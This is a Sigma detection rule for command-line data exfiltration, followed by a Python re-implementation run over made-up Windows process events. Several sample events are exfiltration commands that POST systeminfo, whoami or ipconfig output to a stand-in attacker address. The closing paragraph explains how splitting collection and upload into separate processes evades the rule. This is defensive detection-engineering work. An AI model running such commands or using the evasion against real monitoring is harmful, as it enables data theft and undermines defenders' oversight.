Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

Sigma rule

title: Potential Data Exfiltration Activity Via CommandLine Tools
id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
status: test
description: Detects the use of various CLI utilities exfiltrating data via web requests
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-02
modified: 2025-10-19
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_iwr:
        Image|endswith:
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'curl ' # Alias of Invoke-WebRequest in Windows PowerShell 5.1 (removed in PowerShell 6+)
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - 'irm ' # Alias of Invoke-RestMethod
            - 'iwr ' # Alias of Invoke-WebRequest
            - 'wget ' # Alias of Invoke-WebRequest in Windows PowerShell 5.1 (removed in PowerShell 6+)
        CommandLine|contains|all:
            - ' -ur' # Shortest possible version of the -Uri parameter
            - ' -me' # Shortest possible version of the -Method parameter
            - ' -b' # Shortest possible version of the -Body parameter
            - ' POST '
    selection_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: '--ur' # Prefix of curl's --url flag (curl has no --uri option)
    selection_curl_data:
        CommandLine|contains:
            - ' -d ' # curl's short form of the --data flag
            - ' --data '
    selection_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains:
            - '--post-data'
            - '--post-file'
    payloads:
        - CommandLine|re:
              - 'net\s+view'
              - 'sc\s+query'
        - CommandLine|contains:
              - 'Get-Content'
              - 'GetBytes'
              - 'hostname'
              - 'ifconfig'
              - 'ipconfig'
              - 'netstat'
              - 'nltest'
              - 'qprocess'
              - 'systeminfo'
              - 'tasklist'
              - 'ToBase64String'
              - 'whoami'
        - CommandLine|contains|all:
              - 'type '
              - ' > '
              - ' C:\'
    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
falsepositives:
    - Unlikely
level: high
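The rule's detection logic, re-implemented in Python and run over a handful of constructed process_creation events. This is an added example, not part of the SigmaHQ rule or its test suite: the events, hosts, paths and file names are made up (203.0.113.10 is a documentation address), and the Sigma string-matching semantics the code assumes (case-insensitive `contains`/`endswith`, case-sensitive `re` without the `|i` flag) are stated in the comments.

```python
import re

# Assumed Sigma semantics: `contains`/`endswith` are case-insensitive substring and suffix
# tests, `contains|all` needs every value, `re` is a case-sensitive search (no `|i` flag here).
PS_IMAGES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")
PS_CMDLETS = ("curl ", "Invoke-RestMethod", "Invoke-WebRequest", "irm ", "iwr ", "wget ")
PS_POST_FLAGS = (" -ur", " -me", " -b", " POST ")      # -Uri, -Method, -Body, POST
PAYLOAD_RE = (r"net\s+view", r"sc\s+query")
PAYLOAD_KW = ("Get-Content", "GetBytes", "hostname", "ifconfig", "ipconfig", "netstat",
              "nltest", "qprocess", "systeminfo", "tasklist", "ToBase64String", "whoami")
PAYLOAD_TYPE_REDIRECT = ("type ", " > ", " C:\\")


def contains(value, needles, require_all=False):
    """`contains` (OR over the list) or `contains|all` (AND), case-insensitive."""
    v = value.lower()
    hits = [n.lower() in v for n in needles]
    return all(hits) if require_all else any(hits)


def endswith(value, suffixes):
    """`endswith`, case-insensitive."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def selection_iwr(ev):
    cl = ev["CommandLine"]
    return (endswith(ev["Image"], PS_IMAGES)
            and contains(cl, PS_CMDLETS)
            and contains(cl, PS_POST_FLAGS, require_all=True))


def selection_curl(ev):
    # `all of selection_curl*` in the condition = selection_curl AND selection_curl_data
    cl = ev["CommandLine"]
    return (endswith(ev["Image"], ("\\curl.exe",))
            and contains(cl, ("--ur",))
            and contains(cl, (" -d ", " --data ")))


def selection_wget(ev):
    return (endswith(ev["Image"], ("\\wget.exe",))
            and contains(ev["CommandLine"], ("--post-data", "--post-file")))


def payloads(ev):
    cl = ev["CommandLine"]
    return (any(re.search(p, cl) for p in PAYLOAD_RE)
            or contains(cl, PAYLOAD_KW)
            or contains(cl, PAYLOAD_TYPE_REDIRECT, require_all=True))


def matches(ev):
    """condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads"""
    return (selection_iwr(ev) or selection_curl(ev) or selection_wget(ev)) and payloads(ev)


# Constructed process_creation events for illustration only (not real telemetry).
SAMPLE_EVENTS = {
    # systeminfo output, base64-encoded, POSTed with Invoke-RestMethod -> alert
    "ps_post_systeminfo": {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoP -c "$b=[Convert]::ToBase64String([Text.Encoding]'
                       r'::UTF8.GetBytes((systeminfo | Out-String))); Invoke-RestMethod'
                       r' -Uri http://203.0.113.10/up -Method POST -Body $b"',
    },
    # curl.exe --url ... -d @file, with the payload keyword in the file name -> alert
    "curl_post_whoami_file": {
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe --url https://203.0.113.10/collect -d @C:\Users\Public\whoami.txt",
    },
    # wget.exe --post-file with an ipconfig dump -> alert
    "wget_post_ipconfig": {
        "Image": r"C:\Tools\wget.exe",
        "CommandLine": r"wget.exe --post-file=C:\Users\Public\ipconfig.txt http://203.0.113.10/upload",
    },
    # plain download: no -d/--data and no payload keyword -> no alert
    "curl_download": {
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe --url https://example.com/agent.msi -o C:\Users\Public\agent.msi",
    },
    # cmd.exe wrapper: `net view` is a payload, but the PowerShell branch needs the
    # -Uri/-Method/-Body form and the curl branch needs Image=curl.exe -> no alert ...
    "cmd_net_view_then_curl": {
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c "net view > C:\Users\Public\n.txt & curl --url'
                       r' http://203.0.113.10/x -d @C:\Users\Public\n.txt"',
    },
    # ... and the child curl.exe event carries no payload keyword on its own command line,
    # so it does not alert either: the rule needs the request and the payload on one line.
    "curl_child_of_cmd": {
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl --url http://203.0.113.10/x -d @C:\Users\Public\n.txt",
    },
}


def run(events=SAMPLE_EVENTS):
    """Evaluate the rule over a name -> event mapping; returns name -> bool."""
    return {name: matches(ev) for name, ev in events.items()}
```

The last two events are the caveat worth keeping in mind when tuning: splitting the collection step and the upload into separate processes (a cmd.exe wrapper that writes `net view` to a file, then a curl.exe child that posts that file under a neutral name) yields two events that each satisfy only half of the condition, so neither alerts on its own. Correlating the parent and child command lines, or matching the `-d @`/`--post-file` argument against recently written files, would close that gap.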
